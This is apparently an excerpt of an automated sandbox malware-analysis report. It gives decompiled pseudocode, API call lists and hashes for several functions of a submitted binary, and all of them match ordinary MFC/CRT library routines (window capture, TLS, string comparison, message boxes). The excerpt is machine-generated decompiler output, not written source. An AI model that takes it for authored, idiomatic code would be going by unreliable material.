				_t64 = E004105B2(_t72, _t89, _t85);
				_t81 = _t89;
				_t75 = _t64;
				if(E004117D8(_t89) == 0) {
					L6:
					_v8 = _v8 | 0xffffffff;
					goto L7;
				} else {
					_t93 = _t75;
					if(_t75 == 0) {
						E00406436(_t75, _t81, _t85, _t89, _t93);
					}
					_t81 = _t75;
					if(E00412C5B(_t75) != 0) {
						L7:
						_t66 =  *((intOrPtr*)(_t85 + 0x3c));
						if(_t66 != 0) {
							_t88 =  *((intOrPtr*)(_t66 + 0x20));
						} else {
							_t88 = 0;
						}
						_t68 = E0040EE3C(_t75, _t81, GetCapture());
						if(_t68 != _t89) {
							if(_t68 != 0) {
								_t83 =  *((intOrPtr*)(_t68 + 0x20));
							} else {
								_t83 = 0;
							}
							if(_t83 != _t88 && E004105B2(_t75, _t68, _t88) == _t75) {
								_v8 = _v8 | 0xffffffff;
							}
						}
						goto L18;
					}
					goto L6;
				}
			}

























                  0x00421287
                  0x00421292
                  0x00421294
                  0x0042129a
                  0x0042129d
                  0x004213f0
                  0x004213f0
                  0x004212aa
                  0x004212b0
                  0x004212b3
                  0x004212c0
                  0x004212d2
                  0x004212d5
                  0x004212da
                  0x00421346
                  0x00421346
                  0x00421346
                  0x0042134a
                  0x00421354
                  0x004213aa
                  0x004213b1
                  0x004213bb
                  0x004213bb
                  0x004213c3
                  0x004213c9
                  0x004213c9
                  0x004213d1
                  0x004213d7
                  0x004213dd
                  0x004213e6
                  0x004213e6
                  0x004213dd
                  0x00000000
                  0x004213ed
                  0x0042135d
                  0x00421363
                  0x0042136f
                  0x00421373
                  0x00421399
                  0x00421399
                  0x0042139c
                  0x004213a0
                  0x004213a4
                  0x004213a8
                  0x00000000
                  0x00000000
                  0x00000000
                  0x004213a8
                  0x00421375
                  0x0042137a
                  0x00000000
                  0x00421388
                  0x0042138b
                  0x00421390
                  0x00421392
                  0x00421392
                  0x00421397
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00421397
                  0x0042137a
                  0x004212de
                  0x004212e3
                  0x004212e5
                  0x004212ee
                  0x00421304
                  0x00421304
                  0x00000000
                  0x004212f0
                  0x004212f0
                  0x004212f2
                  0x004212f4
                  0x004212f4
                  0x004212f9
                  0x00421302
                  0x00421308
                  0x00421308
                  0x0042130d
                  0x00421313
                  0x0042130f
                  0x0042130f
                  0x0042130f
                  0x0042131d
                  0x00421324
                  0x00421328
                  0x0042132e
                  0x0042132a
                  0x0042132a
                  0x0042132a
                  0x00421333
                  0x00421340
                  0x00421340
                  0x00421333
                  0x00000000
                  0x00421324
                  0x00000000
                  0x00421302

                  APIs
                  • GetKeyState.USER32(00000001), ref: 00421294
                  • GetCursorPos.USER32(?), ref: 004212B3
                  • ScreenToClient.USER32 ref: 004212C0
                  • GetCapture.USER32 ref: 00421316
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • ClientToScreen.USER32(?,?), ref: 0042135D
                  • WindowFromPoint.USER32(?,?), ref: 00421369
                  • IsChild.USER32(?,00000000), ref: 0042137E
                  • KillTimer.USER32(?,0000E001), ref: 004213BB
                  • KillTimer.USER32(?,0000E000), ref: 004213D7
                    • Part of subcall function 004117D8: GetForegroundWindow.USER32 ref: 004117EC
                    • Part of subcall function 004117D8: GetLastActivePopup.USER32(?), ref: 004117FD
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: ClientKillScreenTimerWindow$ActiveCaptureChildCursorException@8ForegroundFromH_prolog3LastPointPopupStateThrow
                  • String ID:
                  • API String ID: 1544770960-0
                  • Opcode ID: 4a07689c9db685bc27bb4ffb24f0be35f979112e1c51394de2fbae732337afbb
                  • Instruction ID: df39ac5b8854794e06a7082f429ff7eac5bcf5f3c278d8809952c039e30c033c
                  • Opcode Fuzzy Hash: 4a07689c9db685bc27bb4ffb24f0be35f979112e1c51394de2fbae732337afbb
                  • Instruction Fuzzy Hash: F641C631700215EFEB20DBA6DD44AAE7BB6BF54324F50066AE851D76B1EB38DD41CB08
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004208A9, Relevance: 13.6, APIs: 9, Instructions: 96memoryCOMMONLIBRARYCODE
                  Download Yara Rule
                  C-Code - Quality: 83%
                  			E004208A9(void* __ebx, long* __ecx, void* __edi, void* __esi, void* __eflags) {
				void* _t36;
				void* _t39;
				long _t41;
				void* _t42;
				long _t47;
				void* _t53;
				signed int _t55;
				long* _t62;
				struct _CRITICAL_SECTION* _t64;
				void* _t65;
				void* _t66;

				_push(0x10);
				E00431ACE(E0044BED8, __ebx, __edi, __esi);
				_t62 = __ecx;
				 *((intOrPtr*)(_t66 - 0x18)) = __ecx;
				_t64 = __ecx + 0x1c;
				 *(_t66 - 0x14) = _t64;
				EnterCriticalSection(_t64);
				_t36 =  *(_t66 + 8);
				if(_t36 <= 0 || _t36 >= _t62[3]) {
					_push(_t64);
				} else {
					_t65 = TlsGetValue( *_t62);
					if(_t65 == 0) {
						 *(_t66 - 4) = 0;
						_t39 = E00420529(0x10);
						__eflags = _t39;
						if(__eflags == 0) {
							_t65 = 0;
							__eflags = 0;
						} else {
							 *_t39 = 0x453424;
							_t65 = _t39;
						}
						 *(_t66 - 4) =  *(_t66 - 4) | 0xffffffff;
						_t51 =  &(_t62[5]);
						 *(_t65 + 8) = 0;
						 *(_t65 + 0xc) = 0;
						E0042065B( &(_t62[5]), _t65);
						goto L5;
					} else {
						_t55 =  *(_t66 + 8);
						if(_t55 >=  *(_t65 + 8) &&  *((intOrPtr*)(_t66 + 0xc)) != 0) {
							L5:
							_t75 =  *(_t65 + 0xc);
							if( *(_t65 + 0xc) != 0) {
								_t41 = E004148C1(_t51, __eflags, _t62[3], 4);
								_t53 = 2;
								_t42 = LocalReAlloc( *(_t65 + 0xc), _t41, ??);
							} else {
								_t47 = E004148C1(_t51, _t75, _t62[3], 4);
								_pop(_t53);
								_t42 = LocalAlloc(0, _t47);
							}
							_t76 = _t42;
							if(_t42 == 0) {
								LeaveCriticalSection( *(_t66 - 0x14));
								_t42 = E004063FE(0, _t53, _t62, _t65, _t76);
							}
							 *(_t65 + 0xc) = _t42;
							E00431160(_t62, _t42 +  *(_t65 + 8) * 4, 0, _t62[3] -  *(_t65 + 8) << 2);
							 *(_t65 + 8) = _t62[3];
							TlsSetValue( *_t62, _t65);
							_t55 =  *(_t66 + 8);
						}
					}
					_t36 =  *(_t65 + 0xc);
					if(_t36 != 0 && _t55 <  *(_t65 + 8)) {
						 *((intOrPtr*)(_t36 + _t55 * 4)) =  *((intOrPtr*)(_t66 + 0xc));
					}
					_push( *(_t66 - 0x14));
				}
				LeaveCriticalSection();
				return E00431B73(_t36);
			}














                  0x004208a9
                  0x004208b0
                  0x004208b5
                  0x004208b7
                  0x004208ba
                  0x004208be
                  0x004208c1
                  0x004208c7
                  0x004208ce
                  0x004209cf
                  0x004208dd
                  0x004208e5
                  0x004208e9
                  0x0042091d
                  0x00420920
                  0x00420925
                  0x00420927
                  0x00420933
                  0x00420933
                  0x00420929
                  0x00420929
                  0x0042092f
                  0x0042092f
                  0x00420935
                  0x0042093a
                  0x0042093d
                  0x00420940
                  0x00420943
                  0x00000000
                  0x004208eb
                  0x004208eb
                  0x004208f1
                  0x00420900
                  0x00420900
                  0x00420903
                  0x00420967
                  0x0042096d
                  0x00420972
                  0x00420905
                  0x0042090a
                  0x00420910
                  0x00420913
                  0x00420913
                  0x00420978
                  0x0042097a
                  0x0042097f
                  0x00420985
                  0x00420985
                  0x0042098d
                  0x0042099e
                  0x004209aa
                  0x004209af
                  0x004209b5
                  0x004209b5
                  0x004208f1
                  0x004209b8
                  0x004209bd
                  0x004209c7
                  0x004209c7
                  0x004209ca
                  0x004209ca
                  0x004209d0
                  0x004209db

                  APIs
                  • __EH_prolog3_catch.LIBCMT ref: 004208B0
                  • EnterCriticalSection.KERNEL32(?,00000010,00420B6C,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 004208C1
                  • TlsGetValue.KERNEL32(?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 004208DF
                  • LocalAlloc.KERNEL32(00000000,00000000,00000000,00000010,?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 00420913
                  • LeaveCriticalSection.KERNEL32(?,?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 0042097F
                  • _memset.LIBCMT ref: 0042099E
                  • TlsSetValue.KERNEL32(?,00000000,0041F372,00406452,00411FA3), ref: 004209AF
                  • LeaveCriticalSection.KERNEL32(?,?,00000000,?,00000004,0041F372,00406452,00411FA3), ref: 004209D0
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: CriticalSection$LeaveValue$AllocEnterH_prolog3_catchLocal_memset
                  • String ID:
                  • API String ID: 1891723912-0
                  • Opcode ID: 7f57efcd963ca449d36f0365ecac5dd69b34fcef90cf9d521c33b0f43bbe3d9f
                  • Instruction ID: 5362d1717d03bc6381155a69efb60a9799305f1a3338e288a41fad99fcfcfd1f
                  • Opcode Fuzzy Hash: 7f57efcd963ca449d36f0365ecac5dd69b34fcef90cf9d521c33b0f43bbe3d9f
                  • Instruction Fuzzy Hash: 683192B5600616AFEB20AF11E881D6AB7F4FF44310B50C52FF51797662C774A990CF88
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 004289FF, Relevance: 13.6, APIs: 9, Instructions: 86stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 82%
                  			E004289FF(void* __esi, char* _a4, CHAR* _a8) {
				signed int _v8;
				short _v528;
				short _v1048;
				short _v1568;
				int _v1572;
				char* _v1576;
				void* __ebx;
				void* __edi;
				signed int _t20;
				int _t23;
				void* _t26;
				char* _t35;
				CHAR* _t38;
				void* _t39;
				int _t40;
				void* _t45;
				char* _t47;
				void* _t48;
				void* _t52;
				signed int _t55;
				signed int _t57;

				_t49 = __esi;
				_t55 = _t57;
				_t20 =  *0x463404; // 0x38a11573
				_v8 = _t20 ^ _t55;
				_t38 = _a8;
				_t47 = _a4;
				_v1576 = _t38;
				if(lstrcmpiA(_t47, _t38) == 0) {
					_t23 = GetSystemMetrics(0x2a);
					if(_t23 != 0) {
						_push(__esi);
						_v1572 = lstrlenA(_t47);
						if(_v1572 != lstrlenA(_t38)) {
							L14:
							_t26 = 0;
						} else {
							_t40 = GetThreadLocale();
							GetStringTypeA(_t40, 1, _t47, 0xffffffff,  &_v1568);
							GetStringTypeA(_t40, 4, _t47, 0xffffffff,  &_v528);
							GetStringTypeA(_t40, 1, _v1576, 0xffffffff,  &_v1048);
							_t35 = _t47;
							if( *_t47 == 0) {
								L11:
								_t26 = 1;
							} else {
								_t52 = 0;
								while(( *(_t55 + _t52 - 0x20c) & 0x00000080) == 0 ||  *((intOrPtr*)(_t55 + _t52 - 0x61c)) ==  *((intOrPtr*)(_t55 + _t52 - 0x414))) {
									_t52 = _t52 + 2;
									if( *_t35 != 0) {
										continue;
									} else {
										goto L11;
									}
									goto L12;
								}
								goto L14;
							}
						}
						L12:
						_pop(_t49);
					} else {
						_t26 = _t23 + 1;
					}
				} else {
					_t26 = 0;
				}
				_pop(_t48);
				_pop(_t39);
				return E00430650(_t26, _t39, _v8 ^ _t55, _t45, _t48, _t49);
			}
























                  0x004289ff
                  0x00428a02
                  0x00428a0a
                  0x00428a11
                  0x00428a15
                  0x00428a19
                  0x00428a1e
                  0x00428a2c
                  0x00428a37
                  0x00428a3f
                  0x00428a47
                  0x00428a52
                  0x00428a60
                  0x00428aed
                  0x00428aed
                  0x00428a66
                  0x00428a72
                  0x00428a81
                  0x00428a90
                  0x00428aa4
                  0x00428aa9
                  0x00428aab
                  0x00428ad9
                  0x00428adb
                  0x00428aad
                  0x00428aad
                  0x00428aaf
                  0x00428acd
                  0x00428ad7
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00428ad7
                  0x00000000
                  0x00428aaf
                  0x00428aab
                  0x00428adc
                  0x00428adc
                  0x00428a41
                  0x00428a41
                  0x00428a41
                  0x00428a2e
                  0x00428a2e
                  0x00428a2e
                  0x00428ae0
                  0x00428ae3
                  0x00428aea

                  APIs
                  • lstrcmpiA.KERNEL32(00000000,00000000,00000000,?), ref: 00428A24
                  • GetSystemMetrics.USER32 ref: 00428A37
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: MetricsSystemlstrcmpi
                  • String ID:
                  • API String ID: 2335526769-0
                  • Opcode ID: e080c02de74fd4b82b430f72ec3c9409b302c346e750a8042bb942049da280ed
                  • Instruction ID: 79ccf1a60a629e09d7d33ca9d5b2f7e3e78f3aa6161d4a5aaa64ec7c091d6d26
                  • Opcode Fuzzy Hash: e080c02de74fd4b82b430f72ec3c9409b302c346e750a8042bb942049da280ed
                  • Instruction Fuzzy Hash: 47210E717012286BDB205F65AC44F9F7BACEB89720F5006BBF916D21C1DEB49D41CB68
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 0041804C, Relevance: 12.4, APIs: 5, Strings: 2, Instructions: 164stringCOMMON
                  Download Yara Rule
                  C-Code - Quality: 93%
                  			E0041804C(void* __ebx, void* __ecx, void* __edx, void* __edi, signed short* __esi, void* __eflags) {
				signed int _t83;
				intOrPtr _t85;
				void* _t91;
				intOrPtr _t96;
				CHAR** _t98;
				signed int _t101;
				signed int _t103;
				signed int _t108;
				intOrPtr _t110;
				CHAR** _t117;
				int _t120;
				CHAR** _t122;
				int _t125;
				signed int _t126;
				void* _t130;
				void* _t135;
				void* _t148;
				signed int _t150;
				void* _t152;
				signed short* _t156;

				_t151 = __esi;
				_t148 = __edx;
				_t131 = __ecx;
				_push(0x188);
				E00431A9B(E0044B616, __ebx, __edi, __esi);
				_t130 = __ecx;
				_t150 = 0;
				 *(_t152 - 0x10) = 0;
				if( *((intOrPtr*)(_t152 + 8)) != 0) {
					L29:
					_push(_t150);
					_push(0x14000c);
					_push(1);
					E0042A201(_t130, _t152 - 0x194, _t150, _t151, __eflags);
					 *(_t152 - 4) = 3;
					E0042A489(_t152 - 0x194);
					_t83 =  *(_t130 + 0x70);
					__eflags = _t83 - _t150;
					if(_t83 != _t150) {
						E0041FD19(_t83);
					}
					_t84 =  *(_t130 + 0x74);
					__eflags =  *(_t130 + 0x74) - _t150;
					if(__eflags != 0) {
						E0041FD19(_t84);
					}
					_t85 =  *((intOrPtr*)(_t152 - 0x120));
					 *(_t130 + 0x70) =  *(_t85 + 8);
					 *(_t130 + 0x74) =  *(_t85 + 0xc);
					 *((intOrPtr*)(_t152 - 0x194)) = 0x452264;
					_t76 = _t152 - 0x194; // 0x452264
					_t135 = _t76;
					L34:
					 *(_t152 - 4) =  *(_t152 - 4) | 0xffffffff;
					_t87 = E004174FB(_t135, _t150, _t151,  *(_t152 - 4));
					L35:
					return E00431B73(_t87);
				}
				_t91 =  *(__ecx + 0x74);
				if(_t91 == 0) {
					goto L29;
				}
				_t151 = GlobalLock(_t91);
				_t156 = _t151;
				_t87 = 0 | _t156 == 0x00000000;
				_t157 = _t156 == 0;
				if(_t156 == 0) {
					_t87 = E00406436(_t130, _t131, 0, _t151, _t157);
				}
				_t158 = _t151[3] & 0x00000001;
				if((_t151[3] & 0x00000001) == 0) {
					goto L35;
				}
				_push(_t150);
				_push(0x14000c);
				_push(1);
				E0042A201(_t130, _t152 - 0xd8, _t150, _t151, _t158);
				 *(_t152 - 4) = _t150;
				if(E0042A489(_t152 - 0xd8) != 0) {
					_t96 =  *((intOrPtr*)(_t152 - 0x64));
					__eflags =  *((intOrPtr*)(_t96 + 0xc)) - _t150;
					if( *((intOrPtr*)(_t96 + 0xc)) != _t150) {
						_t98 = E0042A49C(_t152 - 0xd8, _t152 - 0x18);
						_t150 = lstrcmpA;
						 *(_t152 - 4) = 1;
						 *(_t152 - 0x10) = 1;
						_t101 = lstrcmpA(_t151 + ( *_t151 & 0x0000ffff),  *_t98);
						__eflags = _t101;
						if(_t101 != 0) {
							L14:
							 *((char*)(_t152 + 0xb)) = 1;
							L15:
							__eflags =  *(_t152 - 0x10) & 0x00000004;
							if(( *(_t152 - 0x10) & 0x00000004) != 0) {
								 *(_t152 - 0x10) =  *(_t152 - 0x10) & 0xfffffffb;
								__eflags =  *((intOrPtr*)(_t152 - 0x1c)) + 0xfffffff0;
								E004010B0( *((intOrPtr*)(_t152 - 0x1c)) + 0xfffffff0, _t148);
							}
							__eflags =  *(_t152 - 0x10) & 0x00000002;
							if(( *(_t152 - 0x10) & 0x00000002) != 0) {
								 *(_t152 - 0x10) =  *(_t152 - 0x10) & 0xfffffffd;
								__eflags =  *((intOrPtr*)(_t152 - 0x14)) + 0xfffffff0;
								E004010B0( *((intOrPtr*)(_t152 - 0x14)) + 0xfffffff0, _t148);
							}
							 *(_t152 - 4) =  *(_t152 - 4) & 0x00000000;
							__eflags =  *(_t152 - 0x10) & 0x00000001;
							if(( *(_t152 - 0x10) & 0x00000001) != 0) {
								__eflags =  *((intOrPtr*)(_t152 - 0x18)) + 0xfffffff0;
								E004010B0( *((intOrPtr*)(_t152 - 0x18)) + 0xfffffff0, _t148);
							}
							__eflags =  *((char*)(_t152 + 0xb));
							if( *((char*)(_t152 + 0xb)) == 0) {
								_t103 =  *( *((intOrPtr*)(_t152 - 0x64)) + 8);
								__eflags = _t103;
								if(_t103 != 0) {
									E0041FD19(_t103);
								}
								_t105 =  *( *((intOrPtr*)(_t152 - 0x64)) + 0xc);
								__eflags =  *( *((intOrPtr*)(_t152 - 0x64)) + 0xc);
								if(__eflags != 0) {
									E0041FD19(_t105);
								}
							} else {
								_t108 =  *(_t130 + 0x70);
								__eflags = _t108;
								if(_t108 != 0) {
									E0041FD19(_t108);
								}
								E0041FD19( *(_t130 + 0x74));
								_t110 =  *((intOrPtr*)(_t152 - 0x64));
								 *(_t130 + 0x70) =  *(_t110 + 8);
								 *(_t130 + 0x74) =  *(_t110 + 0xc);
							}
							goto L6;
						}
						_t117 = E0042A4CF(_t152 - 0xd8, _t152 - 0x14);
						 *(_t152 - 4) = 2;
						 *(_t152 - 0x10) = 3;
						_t120 = lstrcmpA(_t151 + (_t151[1] & 0x0000ffff),  *_t117);
						__eflags = _t120;
						if(_t120 != 0) {
							goto L14;
						}
						_t122 = E0042A503(_t152 - 0xd8, _t152 - 0x1c);
						 *(_t152 - 0x10) = 7;
						_t125 = lstrcmpA(_t151 + (_t151[2] & 0x0000ffff),  *_t122);
						 *((char*)(_t152 + 0xb)) = 0;
						__eflags = _t125;
						if(_t125 == 0) {
							goto L15;
						}
						goto L14;
					}
					_t126 =  *(_t130 + 0x70);
					__eflags = _t126 - _t150;
					if(_t126 != _t150) {
						E0041FD19(_t126);
					}
					E0041FD19( *(_t130 + 0x74));
					 *(_t130 + 0x70) = _t150;
					 *(_t130 + 0x74) = _t150;
				}
				L6:
				 *((intOrPtr*)(_t152 - 0xd8)) = 0x452264;
				_t13 = _t152 - 0xd8; // 0x452264
				_t135 = _t13;
				goto L34;
			}























                  0x0041804c
                  0x0041804c
                  0x0041804c
                  0x0041804c
                  0x00418056
                  0x0041805b
                  0x0041805d
                  0x0041805f
                  0x00418065
                  0x00418216
                  0x00418216
                  0x00418217
                  0x0041821c
                  0x00418224
                  0x0041822f
                  0x00418236
                  0x0041823b
                  0x0041823e
                  0x00418240
                  0x00418243
                  0x00418243
                  0x00418248
                  0x0041824b
                  0x0041824d
                  0x00418250
                  0x00418250
                  0x00418255
                  0x0041825e
                  0x00418264
                  0x00418267
                  0x00418271
                  0x00418271
                  0x00418277
                  0x00418277
                  0x0041827b
                  0x00418280
                  0x00418285
                  0x00418285
                  0x0041806b
                  0x00418070
                  0x00000000
                  0x00000000
                  0x0041807d
                  0x00418081
                  0x00418083
                  0x00418086
                  0x00418088
                  0x0041808a
                  0x0041808a
                  0x0041808f
                  0x00418093
                  0x00000000
                  0x00000000
                  0x00418099
                  0x0041809a
                  0x0041809f
                  0x004180a7
                  0x004180b2
                  0x004180bc
                  0x004180d3
                  0x004180d6
                  0x004180d9
                  0x00418102
                  0x0041810c
                  0x00418115
                  0x00418119
                  0x00418120
                  0x00418122
                  0x00418124
                  0x0041817b
                  0x0041817b
                  0x0041817f
                  0x0041817f
                  0x00418183
                  0x00418188
                  0x0041818c
                  0x0041818f
                  0x0041818f
                  0x00418194
                  0x00418198
                  0x0041819d
                  0x004181a1
                  0x004181a4
                  0x004181a4
                  0x004181a9
                  0x004181ad
                  0x004181b1
                  0x004181b6
                  0x004181b9
                  0x004181b9
                  0x004181be
                  0x004181c2
                  0x004181f0
                  0x004181f3
                  0x004181f5
                  0x004181f8
                  0x004181f8
                  0x00418200
                  0x00418203
                  0x00418205
                  0x0041820c
                  0x0041820c
                  0x004181c4
                  0x004181c4
                  0x004181c7
                  0x004181c9
                  0x004181cc
                  0x004181cc
                  0x004181d4
                  0x004181d9
                  0x004181df
                  0x004181e5
                  0x004181e5
                  0x00000000
                  0x004181c2
                  0x00418130
                  0x0041813e
                  0x00418145
                  0x0041814c
                  0x0041814e
                  0x00418150
                  0x00000000
                  0x00000000
                  0x0041815c
                  0x0041816a
                  0x00418171
                  0x00418173
                  0x00418177
                  0x00418179
                  0x00000000
                  0x00000000
                  0x00000000
                  0x00418179
                  0x004180db
                  0x004180de
                  0x004180e0
                  0x004180e3
                  0x004180e3
                  0x004180eb
                  0x004180f0
                  0x004180f3
                  0x004180f3
                  0x004180be
                  0x004180be
                  0x004180c8
                  0x004180c8
                  0x00000000

                  APIs
                  • __EH_prolog3.LIBCMT ref: 00418056
                  • GlobalLock.KERNEL32 ref: 00418077
                    • Part of subcall function 00406436: __CxxThrowException@8.LIBCMT ref: 0040644C
                    • Part of subcall function 00406436: __EH_prolog3.LIBCMT ref: 00406459
                  • lstrcmpA.KERNEL32(00000000,00000000,?,00000001,0014000C,00000000), ref: 00418120
                  • lstrcmpA.KERNEL32(?,00000000,?), ref: 0041814C
                  • lstrcmpA.KERNEL32(?,00000000,?), ref: 00418171
                  Strings
                  Memory Dump Source
                  • Source File: 00000000.00000002.646252420.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                  • Associated: 00000000.00000002.646248492.0000000000400000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646287294.000000000044E000.00000002.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646297277.0000000000462000.00000004.00020000.sdmp Download File
                  • Associated: 00000000.00000002.646302440.0000000000469000.00000002.00020000.sdmp Download File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_0_2_400000_YF4dF4w2Cr.jbxd
                  Similarity
                  • API ID: lstrcmp$H_prolog3$Exception@8GlobalLockThrow
                  • String ID: d"E$d"E
                  • API String ID: 569107404-4184370214
                  • Opcode ID: f22b6adbf6a52a6464731256e8cc4a1d6826a5d007fc807aca6f42d55c9a3b2b
                  • Instruction ID: 524c0d43197d56bd0e71cd9908d075d591d8cf06ddb31c5e0e4a1a423c794921
                  • Opcode Fuzzy Hash: f22b6adbf6a52a6464731256e8cc4a1d6826a5d007fc807aca6f42d55c9a3b2b
                  • Instruction Fuzzy Hash: AC61A4309002199BDB11EFA5CC45BEEBBF4AF04314F14429FE815A72A2DB78DAC5CB19
                  Uniqueness

                  Uniqueness Score: -1.00%

                  Function 00416F97, Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 115threadwindowCOMMON
                  Download Yara Rule
                  C-Code - Quality: 81%
                  			E00416F97(void* __ecx, void* __edx, void* __eflags, long _a4, intOrPtr _a8, signed int _a12, intOrPtr _a16) {
				signed int _v8;
				char _v9;
				char _v268;
				struct HWND__* _v272;
				signed int _v276;
				long _v280;
				struct HWND__* _v284;
				intOrPtr _v288;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t36;
				signed int _t53;
				intOrPtr _t56;
				long _t59;
				struct HWND__* _t62;
				CHAR* _t63;
				void* _t64;
				void* _t66;
				void* _t70;
				void* _t71;
				long _t72;
				void* _t73;
				void* _t74;
				signed int _t76;
				void* _t77;
				signed int _t81;

				_t70 = __edx;
				_t79 = _t81;
				_t36 =  *0x463404; // 0x38a11573
				_v8 = _t36 ^ _t81;
				_t72 = _a4;
				_t76 = 0;
				_v288 = _a8;
				E00416EAC(0);
				_t66 = _t71;
				_t62 = E00416EE5(0,  &_v272);
				_v284 = _t62;
				if(_t62 != _v272) {
					EnableWindow(_t62, 1);
				}
				_v280 = _v280 & _t76;
				GetWindowThreadProcessId(_t62,  &_v280);
				if(_t62 == 0 || _v280 != GetCurrentProcessId()) {
					L7:
					__eflags = _t72;
					if(__eflags != 0) {
						_t76 = _t72 + 0x78;
					}
					goto L9;
				} else {
					_t59 = SendMessageA(_t62, 0x376, 0, 0);
					if(_t59 == 0) {
						goto L7;
					} else {
						_t76 = _t59;
						L9:
						_v276 = _v276 & 0x00000000;
						if(_t76 != 0) {
							_v276 =  *_t76;
							_t56 = _a16;
							if(_t56 != 0) {
								 *_t76 = _t56 + 0x30000;
							}
						}
						if((_a12 & 0x000000f0) == 0) {
							_t53 = _a12 & 0x0000000f;
							if(_t53 <= 1) {
								_t23 =  &_a12;
								 *_t23 = _a12 | 0x00000030;
								__eflags =  *_t23;
							} else {
								if(_t53 + 0xfffffffd <= 1) {
									_a12 = _a12 | 0x00000020;
								}
							}
						}
						_v268 = 0;
						_t96 = _t72;
						if(_t72 == 0) {
							_t63 =  &_v268;
							_t72 = 0x104;
							__eflags = GetModuleFileNameA(0, _t63, 0x104) - 0x104;
							if(__eflags == 0) {
								_v9 = 0;
							}
						} else {
							_t63 =  *(_t72 + 0x50);
						}
						_push(_a12);
						_push(_t63);
						_push(_v288);
						_push(_v284);
						_t73 = E0040D53F(_t63, _t66, _t72, _t76, _t96);
						if(_t76 != 0) {
							 *_t76 = _v276;
						}
						if(_v272 != 0) {
							EnableWindow(_v272, 1);
						}
						E00416EAC(1);
						_pop(_t74);
						_pop(_t77);
						_pop(_t64);
						return E00430650(_t73, _t64, _v8 ^ _t79, _t70, _t74, _t77);
					}
				}
			}































                  0x00416f97
                  0x00416f9a
                  0x00416fa2
                  0x00416fa9
                  0x00416fb2
                  0x00416fb5
                  0x00416fb8
                  0x00416fbe
                  0x00416fc3
                  0x00416fd1
                  0x00416fd3
                  0x00416fdf
                  0x00416fe4
                  0x00416fe4
                  0x00416fea
                  0x00416ff8
                  0x00417000
                  0x00417028
                  0x00417028
                  0x0041702a
                  0x0041702c
                  0x0041702c
                  0x00000000
                  0x00417010
                  0x0041701a
                  0x00417022
                  0x00000000
                  0x00417024
                  0x00417024
                  0x0041702f
                  0x0041702f
                  0x00417038
                  0x0041703c
                  0x00417042
                  0x00417047
                  0x0041704e
                  0x0041704e
                  0x00417047
                  0x00417054
                  0x00417059
                  0x0041705f
                  0x0041706f
                  0x0041706f
                  0x0041706f
                  0x00417061
                  0x00417067
                  0x00417069
                  0x00417069
                  0x00417067
                  0x0041705f
                  0x00417073
                  0x0041707a
                  0x0041707c
                  0x00417083
                  0x00417089
                  0x0041709a
                  0x0041709c
                  0x0041709e
                  0x0041709e
                  0x0041707e
                  0x0041707e
                  0x0041707e
                  0x004170a2
                  0x004170a5
                  0x004170a6
                  0x004170ac
                  0x004170ba
                  0x004170be
                  0x004170c6
                  0x004170c6
                  0x004170cf
                  0x004170d9
                  0x004170d9
                  0x004170e1
                  0x004170ec
                  0x004170ed
                  0x004170f0
                  0x004170f7
                  0x004170f7
                  0x00417022

                  APIs
                    • Part of subcall function 00416EE5: GetParent.USER32(?), ref: 00416F39
                    • Part of subcall function 00416EE5: GetLastActivePopup.USER32(?), ref: 00416F4A
                    • Part of subcall function 00416EE5: IsWindowEnabled.USER32(?), ref: 00416F5E
                    • Part of subcall function 00416EE5: EnableWindow.USER32(?,00000000), ref: 00416F71
                  • EnableWindow.USER32(?,00000001), ref: 00416FE4
                  • GetWindowThreadProcessId.USER32(?,?), ref: 00416FF8
                  • GetCurrentProcessId.KERNEL32(?,?), ref: 00417002
                  • SendMessageA.USER32(?,00000376,00000000,00000000), ref: 0041701A
